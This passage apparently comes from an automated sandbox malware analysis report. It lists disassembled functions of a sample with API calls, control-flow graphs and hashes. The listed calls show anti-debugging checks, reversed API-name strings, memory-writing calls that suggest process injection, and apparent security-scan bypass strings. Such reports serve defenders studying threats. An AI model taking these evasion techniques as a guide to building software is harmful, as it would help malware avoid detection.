                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DD5C61
                                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DD5C87
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DD5C97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                                                        • Opcode ID: 23775d756b06e0754618453caf6fedc862cd5ea6be405f1f5244f53fc281fd85
                                                                                                                                        • Instruction ID: baf6669b5f1fe591e71dfbad22e0a578ecca11d6cc99fba9037c634fa1deb807
                                                                                                                                        • Opcode Fuzzy Hash: 23775d756b06e0754618453caf6fedc862cd5ea6be405f1f5244f53fc281fd85
                                                                                                                                        • Instruction Fuzzy Hash: C6519571A40A0C7EFB21D6E49C46FEF7BADDB04744F8045A1A604E6281D774DE48CFA0
                                                                                                                                        Function 02DE8798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 10523 2de8798-2de87bd LoadLibraryW 10524 2de87bf-2de87d7 GetProcAddress 10523->10524 10525 2de8807-2de880d 10523->10525 10526 2de87fc-2de8802 FreeLibrary 10524->10526 10527 2de87d9-2de87f8 call 2de7cf8 10524->10527 10526->10525 10527->10526 10530 2de87fa 10527->10530 10530->10526
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,UacScan), ref: 02DE87AC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DE87C6
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize), ref: 02DE8802
                                                                                                                                          • Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                        • API String ID: 1002360270-4067648912
                                                                                                                                        • Opcode ID: b4aa80c8dc1ac915b2abb6f0b55e26ad0c729c1675b9107b437385e892138108
                                                                                                                                        • Instruction ID: fb37dae66a34f06c8442e8d92732995bbfb8e02a1ca18c3c98479bc67bdd45ff
                                                                                                                                        • Opcode Fuzzy Hash: b4aa80c8dc1ac915b2abb6f0b55e26ad0c729c1675b9107b437385e892138108
                                                                                                                                        • Instruction Fuzzy Hash: EBF08C71AC02185AEB10AA6AA84DBB6379CE780356F42092EF10DCB640C7705890CBA0
                                                                                                                                        Function 02DEEBE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 10540 2deebe8-2deec02 GetModuleHandleW 10541 2deec2e-2deec36 10540->10541 10542 2deec04-2deec16 GetProcAddress 10540->10542 10542->10541 10543 2deec18-2deec28 CheckRemoteDebuggerPresent 10542->10543 10543->10541 10544 2deec2a 10543->10544 10544->10541
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02DEEBF8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DEEC0A
                                                                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DEEC21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                        • API String ID: 35162468-539270669
                                                                                                                                        • Opcode ID: ee7607092efe533ddd65ca06b9ea4751511744a845a9465abb73291508ef6690
                                                                                                                                        • Instruction ID: b8f6a589c080914d467d6a152926a15046ed2235939d4c2d54adbd65b181e7d9
                                                                                                                                        • Opcode Fuzzy Hash: ee7607092efe533ddd65ca06b9ea4751511744a845a9465abb73291508ef6690
                                                                                                                                        • Instruction Fuzzy Hash: B2F0A73490464CAEDF12B6E8D8887DCFBA99B09338F6807D4D426712C1E7711A44C6A1
                                                                                                                                        Function 02DEDBA8 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02DD4EDA
                                                                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDC78), ref: 02DEDBE3
                                                                                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DEDC78), ref: 02DEDC13
                                                                                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DEDC28
                                                                                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DEDC54
                                                                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DEDC5D
                                                                                                                                          • Part of subcall function 02DD4C0C: SysFreeString.OLEAUT32(02DEE948), ref: 02DD4C1A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1897104825-0
                                                                                                                                        • Opcode ID: 85cf5070ae57d72509bd3c2c9cd65ae3664227fdf03765c0a2b006a876ddb3ad
                                                                                                                                        • Instruction ID: 55af4c426cc1516219d1b6ec26aec5ec8d6b6f95adc8b5d9c4037f7d0ffb7b34
                                                                                                                                        • Opcode Fuzzy Hash: 85cf5070ae57d72509bd3c2c9cd65ae3664227fdf03765c0a2b006a876ddb3ad
                                                                                                                                        • Instruction Fuzzy Hash: 6021D371A407087AEB11EAE4CC46FDE77BDEB08704F500461B605F72D0DAB4AE459B75
                                                                                                                                        Function 02DEE2F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DEE42E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                                        • Opcode ID: 79c9513c6019be1243a738b9a3eddf50d0ecc0696bf3d76d7dc9e1bec946c52e
                                                                                                                                        • Instruction ID: a5b30a79dfb73c2906f2c72a587b6824160ba2e84cb30f265b0ac2b1449aaf60
                                                                                                                                        • Opcode Fuzzy Hash: 79c9513c6019be1243a738b9a3eddf50d0ecc0696bf3d76d7dc9e1bec946c52e
                                                                                                                                        • Instruction Fuzzy Hash: 28411A35A50558ABEF11FBA4D881ADEB3FAEF48720F218426E042A7354DA74ED058F74
                                                                                                                                        Function 02DEDAC4 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02DD4EDA
                                                                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDB96), ref: 02DEDB03
                                                                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DEDB3D
                                                                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DEDB6A
                                                                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DEDB73
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3764614163-0
                                                                                                                                        • Opcode ID: 90c7b7a963e013973bec3a57487a7d7ef1d44b45e6bb2f7800f8b9a5a43a8570
                                                                                                                                        • Instruction ID: 8db06daaaa01c2f3cb804d385f00ea11882a6e79082ec748a6fd90ede7ab91ac
                                                                                                                                        • Opcode Fuzzy Hash: 90c7b7a963e013973bec3a57487a7d7ef1d44b45e6bb2f7800f8b9a5a43a8570
                                                                                                                                        • Instruction Fuzzy Hash: D621ED71E40708BAEB20EAE4CD46F9EB7BDEB04B04F504461B605F72D0DBB06E048A65
                                                                                                                                        Function 02DE85D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DE8660
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                        • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                        • API String ID: 3130163322-2353454454
                                                                                                                                        • Opcode ID: fb649763568dc983fb13f3ffbc2d510655c963c34de717000a7eaf662174e79f
                                                                                                                                        • Instruction ID: 8ca609075dba55c14c531e58cbf607d3f9777bc3c961749e001c6189e486a7e5
                                                                                                                                        • Opcode Fuzzy Hash: fb649763568dc983fb13f3ffbc2d510655c963c34de717000a7eaf662174e79f
                                                                                                                                        • Instruction Fuzzy Hash: 2B11D0B6680648AFEB40EEA8DD41F9A37EDEB0C710F524558BA09D7750C634ED109B74
                                                                                                                                        Function 02DE79AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                        • API String ID: 4072585319-445027087
                                                                                                                                        • Opcode ID: b7cccbac5ec1d6da9274104e022867323c17e0e4c724762bab84e4e0c1dbc841
                                                                                                                                        • Instruction ID: 9f8584056ef580e67d6ece8bfd643acabd6c76d74154acf02eac7eb60c0abecc
                                                                                                                                        • Opcode Fuzzy Hash: b7cccbac5ec1d6da9274104e022867323c17e0e4c724762bab84e4e0c1dbc841
                                                                                                                                        • Instruction Fuzzy Hash: B2112D75644208BFEF00EFA4DC41E9EB7ADEB48710F914464B909DB740DA30AE148B70
                                                                                                                                        Function 02DE79AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                        • API String ID: 4072585319-445027087
                                                                                                                                        • Opcode ID: aaf2052aaad5a96af2c8941dcd61cc679e7df1093f2edd8e9e3404757fcd17c3
                                                                                                                                        • Instruction ID: 5d4511d4fc110432994e11a89754f6743fadb5d51cc02b2671eda57e83c7028c
                                                                                                                                        • Opcode Fuzzy Hash: aaf2052aaad5a96af2c8941dcd61cc679e7df1093f2edd8e9e3404757fcd17c3
                                                                                                                                        • Instruction Fuzzy Hash: 27112D75644208AFEF00EFA4DC41E9EB7ADEB48710F914464B909DB740DA30AE148B70
                                                                                                                                        Function 02DE824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE82BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                        • API String ID: 2521977463-737317276
                                                                                                                                        • Opcode ID: e14a8c9f8b368b9067e1ee76b737b6ffe8d91b3d7f19ad075078f116b58745ad
                                                                                                                                        • Instruction ID: c66a4c28de3fd4421c56dd77fd04eb0c24a35874da682b06699f374c70bd349c
                                                                                                                                        • Opcode Fuzzy Hash: e14a8c9f8b368b9067e1ee76b737b6ffe8d91b3d7f19ad075078f116b58745ad
                                                                                                                                        • Instruction Fuzzy Hash: 25016978640608AFEF00EFA8D841E9E77EEEB48700F528424F405DB710CA30AD149B64
                                                                                                                                        Function 02DE7CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                        • API String ID: 2719805696-3542721025
                                                                                                                                        • Opcode ID: 95653c4fef91a0800ed5faa40b9d66debefc2cd3c0599d14c8bb117950a38de3
                                                                                                                                        • Instruction ID: abf7d8a52a5649551ab5f4ee6d81510a31584e13a170d75a4bc94863cea0d77d
                                                                                                                                        • Opcode Fuzzy Hash: 95653c4fef91a0800ed5faa40b9d66debefc2cd3c0599d14c8bb117950a38de3
                                                                                                                                        • Instruction Fuzzy Hash: D5012974640608AFEF41FF98D841EAEB7EDEB48710F524854B405D7780C630AD148B74
                                                                                                                                        Function 02DE84BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
